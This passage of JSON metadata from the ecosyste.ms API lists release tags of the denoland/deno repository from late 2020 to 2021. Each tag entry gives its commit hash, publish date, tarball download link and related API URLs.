url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.m